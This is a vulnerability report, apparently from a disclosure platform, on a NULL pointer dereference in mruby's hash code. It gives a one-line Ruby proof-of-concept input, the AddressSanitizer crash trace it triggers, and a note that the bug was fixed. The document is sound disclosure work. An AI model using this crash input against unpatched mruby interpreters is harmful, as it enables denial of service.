NULL Pointer Dereference in mruby/mruby
Valid
Reported on Sep 24th 2021
Description
NULL Pointer Dereference on ea_set
Proof of Concept
```
// poc.rb
[ ** ...1, From: +- ~2]
```
Result
```
mruby/bin/mruby poc.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28787==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55b05da25a1a bp 0x7fffa04443e0 sp 0x7fffa04443c0 T0)
==28787==The signal is caused by a WRITE memory access.
==28787==Hint: address points to the zero page.
    #0 0x55b05da25a19 in ea_set /home/zx/asanmruby/src/hash.c:463
    #1 0x55b05da261df in ar_set /home/zx/asanmruby/src/hash.c:540
    #2 0x55b05da296f1 in h_set /home/zx/asanmruby/src/hash.c:1004
    #3 0x55b05da2aa4c in mrb_hash_set /home/zx/asanmruby/src/hash.c:1246
    #4 0x55b05da63f11 in mrb_vm_exec /home/zx/asanmruby/src/vm.c:2692
    #5 0x55b05da42182 in mrb_vm_run /home/zx/asanmruby/src/vm.c:1032
    #6 0x55b05da8345c in mrb_top_run /home/zx/asanmruby/src/vm.c:2969
    #7 0x55b05daafdef in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
    #8 0x55b05dab00dd in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #9 0x55b05d9ae092 in main /home/zx/asanmruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #10 0x7f3a69d830b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x55b05d9ab42d in _start (/home/zx/asanmruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zx/asanmruby/src/hash.c:463 in ea_set
==28787==ABORTING
```
We have contacted a member of the mruby team and are waiting to hear back
2 years ago
Fixed by c70159b3562e09a37577b4c6913de3ec7b8f06b4